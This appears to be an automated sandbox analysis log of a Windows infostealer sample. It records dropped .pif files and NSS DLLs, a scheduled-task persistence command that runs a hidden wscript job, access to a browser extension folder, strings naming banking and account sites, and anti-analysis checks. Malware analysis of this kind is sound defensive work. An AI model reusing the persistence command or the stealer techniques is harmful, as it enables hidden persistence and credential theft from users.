                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: mg9LPWGtPB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdb source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Hist.pif, 0000000B.00000002.3094585967.000000002B5DB000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Hist.pif, 0000000B.00000002.3088383487.000000001F6FA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: mozglue.pdb source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                    Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                    Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00048AA5 push ecx; ret 11_2_00048AB8
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00368AA5 push ecx; ret 38_2_00368AB8

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\661592\Bk.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\787041\Hist.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifFile created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Windows_Services_AS[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\661592\Bk.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\787041\Hist.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifFile created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\EHIJJDGDHD.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\EHIJJDGDHD.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000A577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_000A577B
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00035EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00035EDA
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003C577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,38_2_003C577B
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00355EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,38_2_00355EDA
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000432E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_000432E9
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found stalling execution ending in API Sleep call
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                    Source: C:\ProgramData\EHIJJDGDHD.exeStalling execution: Execution stalls by calling Sleep
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_11-103504
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifAPI coverage: 4.3 %
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifAPI coverage: 4.9 %
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 6528Thread sleep count: 121 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 5708Thread sleep count: 87 > 30
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif TID: 5700Thread sleep time: -42000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 3220Thread sleep count: 125 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000847B7 GetFileAttributesW,FindFirstFileW,FindClose,11_2_000847B7
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00083E72
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0008C16C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008CB81 FindFirstFileW,FindClose,11_2_0008CB81
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0008CC0C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0008F445
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0008F5A2
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0008F8A3
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00083B4F
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A47B7 GetFileAttributesW,FindFirstFileW,FindClose,38_2_003A47B7
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,38_2_003AC16C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003ACB81 FindFirstFileW,FindClose,38_2_003ACB81
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003ACC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,38_2_003ACC0C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_003AF445
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_003AF5A2
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,38_2_003AF8A3
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_003A3B4F
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_003A3E72
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00035D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00035D13
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: EHDGIJ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: EHDGIJ.11.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: EHDGIJ.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: mg9LPWGtPB.exeBinary or memory string: >:hGfSa
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: EHDGIJ.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: EHDGIJ.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: EHDGIJ.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: EHDGIJ.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: EHDGIJ.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: EHDGIJ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: EHDGIJ.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: EHDGIJ.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxF^
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: EHDGIJ.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: EHDGIJ.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: EHDGIJ.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: EHDGIJ.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: EHDGIJ.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: EHDGIJ.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: EHDGIJ.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: EHDGIJ.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifAPI call chain: ExitProcess graph end nodegraph_11-101035
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000943B9 BlockInput,11_2_000943B9
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00035240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00035240
